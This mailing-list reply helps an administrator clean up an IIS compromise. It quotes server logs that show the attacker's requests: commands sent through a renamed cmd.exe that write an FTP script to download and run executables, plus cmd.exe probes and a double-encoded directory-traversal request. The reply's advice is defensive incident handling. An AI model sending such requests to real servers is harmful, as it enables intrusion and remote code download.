Re: IIS Server Log security breach?

[zeno <bugtraq () cgisecurity net>]

>    Help,   I recently found this on my IIS server after being contacted
>  that my webserver attempted to scan someone's machine on port 80.  I've
>  looked on my web box and found the following files were installed
>  msxc32.exe which seems to be Mirc program which is some type of chat
>  program.  I've talked to other techs here who have not installed this
>  program.  I've traced the following ip addresses back to the domain
>  admins but before I contact I need to know if this is the intruder's ip
>  address and what would be the best course of action. On the flip side
>  what do I need to do to prevent this from happening in the future?  I
>  have since blocked these addresses but this is only a temp fix.


remove fuck.exe it is a copy of cmd.exe renamed. Run windows update and take the box offline.
Reinstall may be needed. Remember when you reinstall you need to install all patches.
Often times people get reinfected /exploited because of this.

I would also portscan your win box for ports you can't explain being open.

Just a quickie blurb

- zeno


>  18:56:21 156.63.205.48 GET
>  /iisadmpwd/fuck.exe?/c+echo+get+shouldNT32.ocx+c:shouldNT32.ocx>>xl32.scr
>  502
>  18:56:23 156.63.205.2 GET
>  /iisadmpwd/fuck.exe?/c+echo+get+shtlng32.dll+c:shtlng32.dll>>xl32.scr 502
>  18:56:25 156.63.205.48 GET
>  /iisadmpwd/fuck.exe?/c+echo+get+smba.dll+c:smba.dll>>xl32.scr 502
>  18:56:27 156.63.205.2 GET
>  /iisadmpwd/fuck.exe?/c+echo+get+sndrec32.dl_+c:sndrec32.dl_>>xl32.scr 502
>  18:56:33 156.63.205.48 GET
>  /iisadmpwd/fuck.exe?/c+echo+get+thds32.exe+c:thds32.exe>>xl32.scr 502
>  18:56:35 156.63.205.2 GET
>  /iisadmpwd/fuck.exe?/c+echo+get+winsd32.ocx+c:winsd32.ocx>>xl32.scr 502
>  18:56:37 156.63.205.48 GET
>  /iisadmpwd/fuck.exe?/c+echo+get+holes.txt+c:holes.txt>>xl32.scr 502
>  18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502
>  18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502
>  20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404
>  20:20:36 216.158.145.245 GET /MSADC/root.exe?/c+dir 404
>  20:20:36 216.158.145.245 GET /c/winnt/system32/cmd.exe?/c+dir 404
>  20:20:36 216.158.145.245 GET /d/winnt/system32/cmd.exe?/c+dir 404
>  20:20:36 216.158.145.245 GET
>  /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
>  20:20:36 216.158.145.245 GET
>
>
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com